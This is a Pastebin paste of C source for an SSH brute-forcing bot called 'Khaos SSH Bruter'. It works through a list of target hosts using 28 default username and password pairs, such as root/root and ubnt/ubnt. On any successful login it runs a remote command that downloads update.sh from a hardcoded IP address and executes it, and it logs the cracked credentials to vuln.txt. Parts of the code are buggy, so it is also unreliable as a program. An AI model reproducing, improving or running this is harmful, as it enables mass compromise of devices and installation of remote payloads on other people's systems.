Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * cp /usr/local/lib/libssh.so /usr/lib/
- *
- * gcc -o update update.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
- *
- */
- #include <stdio.h>
- #include <arpa/inet.h>
- #include <libssh/libssh.h>
- #include <netinet/in.h>
- #include <string.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netdb.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <time.h>
- #define NORM "\033[00;00m"
- #define ALBASTRU "\033[01;34m"
- int test_pass(char *user, char *password, char *host) {
- ssh_session my_ssh_session;
- ssh_channel channel;
- int rc;
- // Open session and set options
- my_ssh_session = ssh_new();
- if (my_ssh_session == NULL)
- return -1;
- ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, host);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, user);
- // Connect to server
- rc = ssh_connect(my_ssh_session);
- if (rc != SSH_OK) {
- ssh_get_error(my_ssh_session);
- ssh_free(my_ssh_session);
- return -1;
- }
- // Authenticate ourselves
- rc = ssh_userauth_password(my_ssh_session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS) {
- ssh_get_error(my_ssh_session);
- ssh_disconnect(my_ssh_session);
- ssh_free(my_ssh_session);
- exit(-1);
- } else {
- channel = ssh_channel_new(my_ssh_session);
- if (channel == NULL) return SSH_ERROR;
- rc = ssh_channel_open_session(channel);
- if (rc != SSH_OK) {
- rc = ssh_channel_request_exec(channel, "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh");
- if (rc != SSH_OK) {
- return 1;
- }
- }
- }
- ssh_disconnect(my_ssh_session);
- ssh_free(my_ssh_session);
- }
- void checkauth(char *user, char *password, char *host) {
- struct sockaddr_in addr_s; struct hostent *hp; struct in_addr *myaddr;
- FILE *vulnf;
- short int fd=-1;
- fd_set fdset;
- struct timeval tv;
- int rc;
- int so_error;
- socklen_t len;
- struct timespec tstart={0,0}, tend={0,0};
- int seconds = 1;
- password[strlen(password)-1] = 0;
- host[strlen(host)-1] = 0;
- addr_s.sin_family = AF_INET; // utilizzo IPv4
- addr_s.sin_addr.s_addr = inet_addr(host);
- addr_s.sin_port = htons(22);
- clock_gettime(CLOCK_MONOTONIC, &tstart);
- fd = socket(AF_INET, SOCK_STREAM, 0);
- fcntl(fd, F_SETFL, O_NONBLOCK); // setup non blocking socket
- // make the connection
- rc = connect(fd, (struct sockaddr *)&addr_s, sizeof(addr_s));
- if ((rc == -1) && (errno != EINPROGRESS)) {
- close(fd);
- return;
- }
- FD_ZERO(&fdset);
- FD_SET(fd, &fdset);
- tv.tv_sec = seconds;
- tv.tv_usec = 0;
- rc = select(fd + 1, NULL, &fdset, NULL, &tv);
- switch(rc) {
- case 1: // data to read
- len = sizeof(so_error);
- getsockopt(fd, SOL_SOCKET, SO_ERROR, &so_error, &len);
- if (so_error == 0) {
- clock_gettime(CLOCK_MONOTONIC, &tend);
- } else { // error
- return;
- }
- break;
- case 0: //timeout
- return;
- }
- close(fd);
- if(test_pass(user, password, host)) {
- myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
- myaddr->s_addr=inet_addr(host);
- hp = gethostbyaddr((char *) myaddr,4,AF_INET);
- if((hp!=NULL)){
- vulnf=fopen("vuln.txt","a+");
- fprintf(vulnf,"%s:%s:%s\n",user,password,hp->h_name);
- printf("\nKhaos Got Another root -> %s:%s:%s -> %s\n",user,password,host,hp->h_name);
- } else {
- vulnf=fopen("vuln.txt","a+");
- fprintf(vulnf,"%s:%s:%s\n",user,password,host);
- printf("\nKhaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n",user,password,host);
- }
- }
- }
- int main(int argc, char **argv)
- {
- FILE *fp, *vulnf;
- char *c;
- char buff[4096];
- int i;
- int numforks,maxf;
- char *combos[28][2];
- combos[0][0] = "root";
- combos[0][1] = "root";
- combos[1][0] = "root";
- combos[1][1] = "admin";
- combos[2][0] = "root";
- combos[2][1] = "password";
- combos[3][0] = "root";
- combos[3][1] = "default";
- combos[4][0] = "root";
- combos[4][1] = "toor";
- combos[5][0] = "admin";
- combos[5][1] = "admin";
- combos[6][0] = "admin";
- combos[6][1] = "1234";
- combos[7][0] = "admin";
- combos[7][1] = "12345";
- combos[8][0] = "admin";
- combos[8][1] = "password";
- combos[9][0] = "ubnt";
- combos[9][1] = "ubnt";
- combos[10][0] = "vagrant";
- combos[10][1] = "vagrant";
- combos[11][0] = "test";
- combos[11][1] = "test";
- combos[12][0] = "root";
- combos[12][1] = "ubnt";
- combos[13][0] = "telnet";
- combos[13][1] = "telnet";
- combos[14][0] = "guest";
- combos[14][1] = "guest";
- combos[15][0] = "root";
- combos[15][1] = "vagrant";
- combos[16][0] = "default";
- combos[16][1] = "";
- combos[17][0] = "cisco";
- combos[17][1] = "cisco";
- combos[18][0] = "root";
- combos[18][1] = "5up";
- combos[19][0] = "user";
- combos[19][1] = "password";
- combos[20][0] = "user";
- combos[20][1] = "user";
- combos[21][0] = "root";
- combos[21][1] = "debian";
- combos[22][0] = "root";
- combos[22][1] = "alpine";
- combos[23][0] = "root";
- combos[23][1] = "ceadmin";
- combos[24][0] = "root";
- combos[24][1] = "indigo";
- combos[25][0] = "root";
- combos[25][1] = "linux";
- combos[26][0] = "root";
- combos[26][1] = "rootpasswd";
- combos[27][0] = "root";
- combos[27][1] = "timeserver";
- struct hostent *hp; struct in_addr *myaddr;
- if((fp=fopen("mfu.txt","r"))==NULL) exit(printf("\e[1;31mFATAL: I Can't Open mfu.txt\n"NORM));
- printf("\e[1;31mKhaos SSH Bruter \e[00;00m- \e[1;32m\n"NORM);
- maxf=atoi(argv[1]);
- while(fgets(buff,sizeof(buff),fp))
- {
- c=strchr(buff,'n');
- if(c!=NULL) *c='.';
- if (!(fork())) {
- // printf("--> Atacare %s",buff);
- for(i = 0; i < 27; i++) {
- buff[strlen(buff)-1] = 0;
- if(test_pass(combos[i][0], combos[i][0], buff)) {
- myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
- myaddr->s_addr=inet_addr(buff);
- hp = gethostbyaddr((char *) myaddr,4,AF_INET);
- if((hp!=NULL)){
- vulnf=fopen("vuln.txt","a+");
- fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], hp->h_name);
- printf("Khaos Got Another root -> %s:%s:%s -> %s\n", combos[i][0], combos[i][1], buff, hp->h_name);
- } else {
- vulnf=fopen("vuln.txt","a+");
- fprintf(vulnf,"%s:%s:%s\n", combos[i][0], combos[i][1], buff);
- printf("Khaos Got Another root -> %s:%s:%s -> Can't Resolve DNS\n", combos[i][0], combos[i][1], buff);
- }
- break;
- }
- }
- exit(0);
- } else {
- numforks++;
- if (numforks > maxf) for (numforks; numforks > maxf; numforks--) wait(NULL);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement